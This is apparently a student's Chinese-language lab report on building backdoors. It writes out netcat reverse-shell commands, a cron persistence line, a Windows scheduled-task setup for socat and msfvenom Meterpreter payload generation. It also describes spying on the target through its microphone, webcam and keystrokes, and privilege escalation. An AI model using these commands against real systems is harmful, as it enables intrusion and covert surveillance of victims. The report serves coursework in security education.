目录

1.实验内容

1. 任务主机使用netcat获取虚拟机操作shell，cron启动定时任务监听虚拟机端口。
2. 虚拟机使用socat获取主机操作shell，启动计划任务。
3. 掌握后门的基础知识，学习使用nc实现Windows，Linux之间的后门连接，学习使用Metaspolit的msfvenom指令生成简单的后门程序，学会MSF POST模块的应用。

2.实验过程

1.问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

• 笔记本的固件或者编译器自带。
• 安装应用软件时附带的。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

• windows：实验中做过的方式有直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序。
• linux：通过在cron中添加任务，定时执行、通过一些脚本启动后门程序、通过和其他程序捆绑运行后门程序。

(3)Meterpreter有哪些给你映像深刻的功能？

• 可以生成任意形式的shellcode，操作简便。
• 针对不同操作系统有很多种提权的方式。
• 可以获取攻击机的摄像头。

(4)如何发现自己有系统有没有被安装后门？

• 使用杀软扫描。
• 查看端口、服务、任务计划、开机自启动项等是否异常。

2.环境准备

• 主机：Windows 7
• 靶机：Kali Linux Debian 10

3.具体实验

(1)使用netcat获取主机操作Shell，cron启动任务

• 查看主机和靶机的ip
  • 主机ip
    

    

  • 靶机ip：
    

    

• 在主机中使用ncat -l -p 2325（学号后四位）监听本机的2325端口
  

  

• 在主机中获取虚拟机shell
  • 在虚拟机中使用nc 172.20.10.5（主机IP） 2325 -e /bin/sh连接主机反弹shell
    

    

  • 成功getshell
    

    

• 在虚拟机中获取主机shell
  • 在虚拟机中用nc -l -p 2325监听主机2325端口
    

    

  • 在主机中用ncat -e cmd 192.168.174.141 1218
    

    

• 在虚拟机中启动cron并在主机监听
  • 先在虚拟机上用crontab -e启动cron，cron是Linux下的定时任务，每一分钟运行一次，根据配置文件执行预设的指令。
    

    

  • crontab 指令增加一条定时任务， -e 表示编辑。添加 * * * * * /bin/netcat 172.20.10.5 2325 -e /bin/sh 表示每秒反向连接 Windows 主机的 2325 端口。
    

    

  • 主机端监听，回车，1秒过后可以输入命令。
    

    

    (2)使用socat获取主机操作Shell, 任务计划启动

• 创建任务，完成命名，设置触发器和操作。
  

  

  
  

  

• 触发器按预定时间，到时间后windows主机会运行socat.exe并弹窗
  

  

• windows主机弹窗后即可在linux端输入指令
  

  

  
  

  

  (3)使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

• 在Kali上用MSF meterpreter生成后门可执行程序20212325_backdoor.exe
  

  

• 在Windows上监听2325端口等待接收可执行文件20212325_backdoor.exe
  

  

• 在Kali上将生成的20212325_backdoor.exe传送给Windows
  

  

• 然后就可以看到windows主机端出现了后门文件
  

  

• 在kali上使用msfconsole指令进入msf控制台
  

  

• 对msf控制台进行配置，依次输入以下命令
  

  

• 接着输入exploit进行监听，在Windows在打开20212325_backdoor.exe后成功获取到Windows的shell（要把所有杀毒软件退出，否则打开后门程序时很容易出现拒绝访问的情况）
  

  

  
  

  

  (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

• 获取目标主机音频，在之前进入的MSF exploit中输入record_mic指令进行录音（-d可设置时长）
  

  

• 获取目标主机摄像头，输入webcam_snap指令控制摄像头进行拍照
  

  

  
  

  

• 获取击键记录，输入keyscan_start开始捕获键盘记录，keyscan_dump获取击键记录（-d可设置时长）
  

  

• 截取主机屏幕，使用screenshot指令可以进行截屏
  

  

  
  

  

• 提权操作
  

  

  (5)使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell。

• 使用命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.191.128 LPORT=4308 -x /home/20212325lft/20212325_pwn1 -f elf > 20212325_pwn2生成以20212325_pwn1模板这个elf文件格式的shellcode文件
  

  

• 输入指令msfconsole，进入msf命令行
  

  

• 对msf进行配置，进入handler模式，设置payload
  

  

• 设置host、post，启动监听
  

  

• 在kali上新开一个终端窗口，先加权限 chmod +x 20212325_pwn2，之后运行。此时攻击机Linux上已经获得了靶机Linux的连接，并且得到了远程控制的shell，执行ls命令。
  

  

  3.问题及解决方案

• 问题1：crontab 指令增加定时任务失败
  问题1解决方案：在网上查找类似问题的解决方法后看到了实验一中写入文件的方式，尝试后成功
  

  

• 问题2：在sudo命令下使用MSF meterpreter生成后门可执行程序20212325_backdoor.exe时权限仍旧不够
• 问题2解决方案：切换到root用户下进行操作
  

  

  4.学习感悟、思考等

  理解好原理再实验：使用MSF meterpreter生成可执行文件，利用ncat传送到主机的时设定LHOST时填写的应该是kali的IP，而kali发送生成的后门文件传送给Windows时应该填windows的IP。前者是因为要反弹回连Kali，后者是因为要传输给windows必须获知其IP。要理解好实验的内在逻辑性才不至于填乱，一开始未想清楚就做实验导致做了好几次。
  提高对于后门程序的警惕性：使用MSF很容易就能控制Windows。windows上给了用户很大的自由空间，甚至杀毒软件对可疑程序的处理都会询问用户。如果我们安全意识不够高，不定时检查系统是否存在漏洞，经常随意在网上下载文件，用破解程序来破解收费软件（此类程序往往会说明破解会导致杀软误报，让我们关闭杀软），很容易就给后门程序可趁之机，让我们完全暴露在威胁下。

参考资料

• 老师提供的下载链接
• 学长的博客
• Linux 基础 - 非交互模式写入crontab定时任务
• MSF Exploit入侵电脑实践(Win7/Win10皆可)